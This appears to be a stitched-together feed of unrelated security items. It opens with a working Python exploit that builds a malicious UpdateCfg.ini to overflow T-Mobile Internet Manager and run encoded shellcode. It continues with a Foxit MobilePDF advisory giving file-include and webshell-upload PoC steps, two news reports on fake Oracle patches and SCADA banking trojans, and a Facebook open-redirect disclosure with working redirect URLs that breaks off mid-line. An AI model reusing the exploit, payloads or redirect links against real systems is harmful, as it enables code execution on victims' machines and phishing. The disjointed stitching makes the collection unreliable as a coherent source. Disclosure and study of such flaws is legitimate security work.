#!/usr/bin/python # coding: utf-8 #Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow #Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06) #Software for usb Wireless:T-Mobile web'n'walk Stick Fusion #Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html #Software Link:https://www.t-mobile.de/downloads/neu/winui.zip #Found:8.01.2015 #Exploit Author: metacom - twitter.com/m3tac0m #Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN #Video poc:http://bit.ly/17DhwSR print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n" print "[*]Open Program and go to Menu-Options \n" print "[*]Click Update and press Now look for Update\n" from struct import pack junk="\x41" * 18073 nseh="\xeb\x06\x90\x90" seh=pack('<I',0x6900CEAE)#6900CEAE 5F POP EDI intl.dll nops="\x90" * 100 #msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | #msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50" "\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33" "\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b" "\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50" "\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c" "\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54" "\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b" "\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c" "\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31" "\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47" "\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54" "\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e" "\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30" "\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57" "\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31" "\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45" "\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50" "\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30" "\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a" "\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c" "\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58" "\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b" "\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d" "\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d" "\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33" "\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52" "\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35" "\x43\x30\x41\x41") header = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x0a" header += "\x0a\x55\x50\x44\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x0a\x0a\x5b\x53\x65\x72\x76\x69" header += "\x63\x65\x5d\x0a\x0a\x0a\x0a\x6d\x65\x74\x61\x63\x6f\x6d\x3d\x74\x77\x69\x74\x74\x65\x72\x2e\x63\x6f\x6d\x2f\x6d\x33\x74" header += "\x61\x63\x30\x6d\x0a\x0a\x0a\x0a\x53\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f" header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73" header += "\x70\x78\x0a\x0a\x0a\x0a\x55\x70\x64\x61\x74\x65\x52\x65\x70\x6f\x72\x74\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f" header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x52\x65\x73\x75\x6c\x74\x52\x65" header += "\x70\x6f\x72\x74\x2e\x61\x73\x70\x78"+junk+nseh+seh+nops+shellcode+'\n\n' footer = "\x0a\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48" footer += "\x3d\x2e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33" footer += "\x30\x30\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54" footer += "\x5f\x54\x49\x4d\x45\x4f\x55\x54\x3d\x32\x30\x0a\x0a\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x0a" footer += "\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53\x79\x73\x3d\x31\x0a" exploit = header + footer filename = "UpdateCfg.ini" file = open(filename , "w") file.write(exploit) file.close() Source

Document Title: =============== Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1400 Release Date: ============= 2015-01-12 Vulnerability Laboratory ID (VL-ID): ==================================== 1400 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere. Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing. Share, store and synchronize PDF files. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Foxit Corporation Product: MobilePDF - iOS Web Application (Wifi) 4.4.0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. The local file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the wifi web interface by usage of the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script code to compromise the iOS app. The execution of unauthorized local file or path request occurs in the index of documents module of the wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side of the affected iOS application. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components. Vulnerable Method(s): [+] POST Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename (name) Affected Module(s): [+] Index of Documents (http://localhost:8888) 1.2 An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server. The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension `pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file extension and can access the webshell with elevated access rights to execute. The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (aap/device) and compromise of http web-server. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename (multiple extensions) Affected Module(s): [+] Index of Documents (http://localhost:8888) Proof of Concept (PoC): ======================= 1.1 The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Download and install the FoxIT MobilePDF iOS application 2. Surf to the Documents Index of the Wifi Server (http://localhost:8888) 3. Start to choose a file for the upload function by usage of the search 4. Intercept the session by usage of a tamper and change the name value to the local device path source 5. Continue the request and save the settings. After that go back to the Index of Documents Note: The execution of the script code occurs in the vulnerable name value of the index file dir list 6. Successful reproduce of the security vulnerability! PoC: Index of Documents (Name) <tr><td><a href="/<img src="><img src="./[LOCAL FILE INCLUDE VULNERABILITY!]</a"></a></td><td align="center">file</td> <td align="center"><span class="m">2015-01-10 13:49</span></td><td align="center"><span class="s">538 B</span></td></tr> --- PoC Session Logs [POST] (File Include > Upload)--- Status: 200[OK] POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent [Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8888/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------3796507625132 Content-Disposition: form-data; name="button"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png" Content-Type: image/png --- PoC Session Logs [GET] (File Dir Index List)--- 13:54:26.427[48ms][total 48ms] Status: 200[OK] GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8888/] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[142] Date[Sa., 10 Jan. 2015 12:49:30 GMT] Reference(s): http://localhost:8888/ http://localhost:8888/%3C/./ 1.2 The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: URL http://localhost:8888/./webshell.png.html.php PoC: Index of Documents <tr><td><a href="/webshell.png.html.php.js.png">webshell.png.html.php.js.png</a></td> <td align="center">file</td><td align="center"><span class="m">2015-01-10 13:58</span></td> <td align="center"><span class="s">538 B</span></td></tr> --- PoC Session Logs [POST] --- 14:03:16.481[149ms][total 1583ms] Status: 200[OK] POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8888/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------282243582256 Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png" Content-Type: image/png Reference(s): http://localhost:8888/ http://localhost:8888/./webshell.png.html.php Solution - Fix & Patch: ======================= 1.1 The file include vulnerability can be paütched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request. Restrict the filename input and filter with an own set exception to prevent application-side attacks. Parse also in the Index of Documents the vulnerable name output value to solve the issue. 1.2 Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions. Restrict the upload folder and disallow the execution of files that are already uploaded. Security Risk: ============== 1.1 The security risk of the local file include web vulnerability in the upload POSt method request is estimated as high. (CVSS 6.9) 1.2 The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Source

Hackers are targeting enterprise companies with bogus, malware-laden patches purporting to come from Oracle. Antonella Giovannetti, Oracle's Proactive response team engineer, warned in a threat advisory that customers to be vigilant about the attacks. "Warning. It has come to our attention that there are non-Oracle sites offering Oracle 'fixes' for genuine Oracle error messages," read the advisory. The malware and the specific attack sites remain unknown, and Oracle had not responded to V3's request for further details at the time of publishing. Despite the lack of firm information on the threat, Giovannetti urged customers to take a variety of pre-emptive protective measures. "You probably already don't need to be told. However, please do not download these fixes as they are not authorised by us in any way and they are more than likely to be dangerous to your system," read the advisory. F-Secure security advisor Sean Sullivan told V3 that, while details about the attacks remain scarce, campaigns trying to infect companies using messages masquerading as legitimate updates are not uncommon. "Given the target-base - Oracle customers - I think I'd categorise this as a type of search engine optimisation [sEO] or watering hole attack. So not common, but not uncommon," he said. "We've seen lots of industries targeted in the last year or two. Sounds like bad the guys have done some SEO work to lure potential victims to legit-looking sites that offer 'patches'." Jason Steere, director of technology strategy at FireEye, mirrored Sullivan's suggestions, revealing that the firm sees similar attacks on a regular basis. "It's probably a crimeware or ransomware attack going for high-volume infection to sell on infected PCs to a bot," he told V3. "Very sadly, many end users believe what they see. It's just another week and another attack using fake update mechanisms. It's very common as it plays on the fear of end users." Oracle's warning follows the discovery of several large-scale hack campaigns. Attackers managed to deface the US Central Command's Twitter and YouTube feeds on Monday. Source

Trend Micro researcher Kyle Wilhoit says the latest attacks on SCADA and industrial control networks are turning out to carry rather pedestrian banking Trojans, and have been on the rise since October 2014. Talking to DarkReading, Wilhoit said rather than Stuxnet-style attacks, ne'er-do-wells are dropping banking Trojans into these networks disguised as updates to SCADA software. So far, the DarkReading piece says, he's seen the attack software disguised as Siemens' Simatic WinCC, GE Cimplicity, and Advantech device drivers. Rising numbers of attacks on SCADA environments in recent years have put sysadmins on edge. Apart from the nation-state-level Stuxnet, there's been a growing number of bugs identified in SCADA software. Apart from generic bugs like Heartbleed and Poodle, which are inherited via popular libraries the vendors deploy, industrial systems also suffer from all-too-common problems like hard-coded passwords and remote-access bugs. The SCADA-specific Havex and BlackEnergy attacks also grabbed headlines in 2014. That makes the banking Trojan more unexpected, Wilhoit said, adding: “The ultimate end goal here is probably not industrialised espionage, but to get banking credentials”. That, of course, assumes that there are industrial controllers whose owners allow operators to use as bank login points. Wilhoit adds that many industrial control systems use Windows as the human interface platform, and users in those environments don't seem particularly diligent at running anti-virus and other security software. He notes that a successful crimeware attack on a Windows-based industrial controller would be catastrophic even if it didn't make a steel plant explode: if, for example, someone deployed a Cryptolocker-based attack against the control system, it would be rendered unusable. “HMI systems are very finicky, so it doesn't take much to make these things fall over. Financial information could be stolen, but what if an [HMI] box drops inadvertently?” Wilhoit added. He will be detailing his findings at Miami's S4 ICS/SCADA conference next week. Source

*Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Security Vulnerability* *Domain:* http://www.facebook.com *Discover:* Wang Jing, School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ *(1) General Vulnerabilities Description:* *(1.1)* Two Facebook vulnerabilities are introduced in this article. Facebook has a security problem. It can be exploited by Open Redirect attacks. Since Facebook is trusted by large numbers of other websites. Those vulnerabilities can be used to do "Covert Redirect" to other websites such as Amazon, eBay, etc. *(1.1.1)* One Facebook Open Redirect vulnerability was reported to Facebook. Facebook adopted a new mechanism to patch it. Though the reported URL redirection vulnerabilities are patched. However, all old generated URLs are still vulnerable to the attacks. Section (2) gives detail of it. The reason may be related to Facebook's third-party interaction system or database management system or both. Another reason may be related to Facebook's design for different kind of browsers. *(1.1.2)* Another new Open Redirect vulnerability related to Facebook is introduced, too. For reference, please read section (3). Tests were performed on Firefox (version 26.0) on windows 7; Firefox (version 24.0) on Ubuntu 12.10, Chrome (Version 30.0.1599.114) on Ubuntu 12.10. *(1.2) Facebook's URL Redirection System Related to "*.php" Files* All URLs' redirection are based on several files, such l.php, a.php, landing.php and so on. The main redirection are based on file "l.php". For file "l.php", one parameter "h" is used for authentication. When it mentions to file "a.php", parameter "eid" is used for authentication. All those two files use parameter "u" for the url redirected to. In some other files such as "landing.php", parameters such as "url", "next" are used. <1>For parameter "h", two forms of authentication are used. <a>h=HAQHyinFq <b>h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA <2>For parameter "eid", one form of authentication is used. <a>eid=AQLP8sRq6lbU0jz0lARx9A9uetB6FIF1N2-Yjj_ePj0d_ezubjstZeDo6qDsalKVJwy6uDb_hQ-9tBsA2dVoQRq0lniOu0os_gPe3gY5l8lYblhQSwBtdvgjXjNqa xLZMYoasr3vv46tFsh1fL7q4kjT2LFw52dnJWd4SE8qc0YuPWf gPeQywgM2wl0CoW-lftWkr2dX0dLcytyHjXnvhKfVS_pQBllszUzsPENxE6EuZ-53Lh188o56idnfyyk2L58pE7C94PF-za4ZVB0qbuA2EnPcSJI-7oIiIJmIhifHe0CYTzG512-Z_heN44VlyJHevhS9auAR8-lFCAIlYymnT_Qiwp92RxjNOfBypBvszQUrvB6PH3fANn1prfMB Vm4RD_GFel14KVDS5USswbTOTkL3sZNhHUqqPHwBwU3JFePMMu wsfesigH85B_AxCsXUIWN7klKGSq8bPPsKSHttsa9hkkMpSfRK L7D_xwW4dU2xlmfGWil7jYRJmwfbOeF0zujk1FRBuM757tbfFM av-J-K9npbdrDrCuUVqV__Tf7CGZ89nPl-M2d09pE9enJj0OBXOaSXZX16LKaYnv1Wh4GKme7C-EOunITxyQtp1zy-48Uaz9mxO2x4bw7sBDfzDStF_Al8_0SMjWNTh-J38rBHAgT96X-dPFI43HU3x3fVymE9szrclBpvTaSfYezatgMzf77s3lQrQAMSl wSSRIzRuoFvQBmWKT0T5ZFgH5ykhYKhNMiKj577UO5g2Ojm-_-KKF4N_DBuG5R-I6EOSlhok2xUkpKVDnDcxZFTLxGmx5xc56J5kZLjJ96wnF2fH0 9Q19Qc2aU3xYFlEFrKjrlLpwGyOyCDx7_z7y1O4Efqew3Fa0Cb 9s6Kk2jpLF5XEIaYzzXOLAffxXG6icBJVovb9RPmiZ5s9dKYYo tLol68_X04O05bEvVccPEh-IQwX_VTMt3f23be2MECEq R2l1A1ZkJx4qP00GI1pZhU_CXAnjSaTNmtaINRUeSsLNEZZsPw pWJMfeeGSwuof9krC05eSWjO0jH9tua0KteMYhj8i-3dwSBp4f7nMcFwH5ltfCLhMCYNB8rxgzcAczyhLIo2UY-3FSaJXBZ0lvuZBvnj7myUnyc2lCcy-fWh93MRRaJrrinjtfr9fDSMHM9Cja5xi0eG3Vs0aClnWbeJZA7 9TvmYt7E53HfwGuv5-EJOqRh3cwZF-53uPHA73ikUk3xTApjQunJM4uIBhpy7iBIgn_OXXo3X03YUJtJ cDuC20ocJbZ310VHliox5tYZF2oiMaOfgo9Y9KeqgsrJgwPCJe if4aB0Ne4g_oM_Tuqt2pXbdgoCawHIApF087eFKJqejp0jpEkJ erXPyK-IqsD_SQfIm_2WJSkzwzATwQKs *(2) Vulnerability Description 1:* *(2.1) *A security researcher reported two Open Redirect vulnerabilities to Facebook in 2013. The following are the two links reported. http://www.facebook.com/l.php?u=http://www.bing.com&h=mAQHgtP_E http://facebook.com/campaign/landing.php?url=http://www.adcash.com Though a new mechanism was adopted. However, all old generated redirections still work by parameter "h" and "eid". *(2.2)* A website was used for the following tests. The website is " http://www.tetraph.com/". Suppose this website is malicious. *(2.2.1)* <1>First test <a>file: "l.php" <b>URL parameter: "u" <c>authentication parameter: "h" <d>form: "h=HAQHyinFq". <e>The authentication has no relation with all other parameters, such as "s". Examples: *URL 1:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.aboutads.info%2F&h=lAQHmVMhS&s=1 *Redirect Forbidden:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=lAQHmVMhS&s=1 *Redirect Works:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=zAQHEyzSM&s=1 *URL 2:* http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fweborama.com%2F&h=DAQEpwCpS&s=1 *Redirect Forbidden:* http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=DAQEpwCpS&s=1 *Redirect Works:* http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=wAQEE6xBX&s=1 *(2.2.2)* <2>Second test. It is the same situation as above. <a>file: "l.php", <b>url parameter "u" <c>authentication parameter: "h" <d>form: "h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA". <e>The authentication has no relation to all other parameters, such as "env", "s". Examples: *URL 1:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxq vjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1 *Redirect Forbidden:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxq vjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1 *Redirect Works:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw&enc=AZM7oFmJObAuJmy999wnRjD-QralcP-Ust3CHBrFxZ85bS1oI5vS46cPhdJmYq6YcfsTcZYBrPTRsZyEe HCe_rdQ&s=1 http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw *URL 2:* http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3 DNdWaZkvAJfM&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui 6nWmRBqQDoZE0cVww6&s=1 *Redirect Forbidden:* http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=GAQHkk7KaAQFgp-1UpPt8vTc1mpZVcR-ZCObBHYZTd6oRUA&enc=AZPA-1iOt4L5BTDo2RMqXagplQxCjYMuw6LZzH3XdMeOpvvcwMdzZwp lx5OZLlH0q8QszFr2Nu9Ib_tA8l8So-pW&s=1 *Redirect Works:* http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui 6nWmRBqQDoZE0cVww6&s=1 *(3) Facebook File "a.php" Open Redirect Security Vulnerability* *(3.1)* <a>file: "a.php" <b>parameter "u" <c> authentication parameter: "eid" <d> form: "eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w". <e>The authentication has no relation to all other parameters, such as "mac", "_tn_". Examples: *Vulnerable URL:* https://www.facebook.com/a.php?u=http%3A%2F%2Ffb-nym.adnxs.com%2Ffclick%3Fclickenc%3Dhttp%253A%252F %252Fbs.serving-sys.com%252FBurstingPipe%252FadServer.bs%253Fcn%25 3Dtf%2526c%253D20%2526mc%253Dclick%2526pli%253D878 2431%2526PluID%253D0%2526ord%253D%257BCACHEBUSTER% 257D%26cp%3D%253Fdi%253DzGxX6INl-T9QvRSibN_3P5qZmZmZmfk_UL0Uomzf9z_ObFfog2X5P_WPPCu D-to_CKEeLew3cQIQkc9SAAAAAHQcDQB2BQAAKAcAAAIAAAD4iq8 AanMCAAAAAQBVU0QAVVNEAGMASABq4DoFka4BAgUCAQUAAIgAk inLswAAAAA.%252Fcnd%253D%252521qQYdPgjeqqYBEPiVvgU Y6uYJIAA.%252Freferrer%253Dfacebook.com%252F&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w *POC:* https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.xhamster.com&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w *(3.2) Facebook Login Page Covert Redirect Security Vulnerability* *Vulnerable URL Related to Login.php Based on a.php:* https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa. php%3Fu%3Dhttp%253A%252F%252Fwww.rp.edu.sg%252Fope nhouse2014%252F%253Futm_source%253Dfacebook%2526ut m_medium%253Dcpc%2526utm_campaign%253Dopenhouse201 4%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid %3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzRO StFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lW 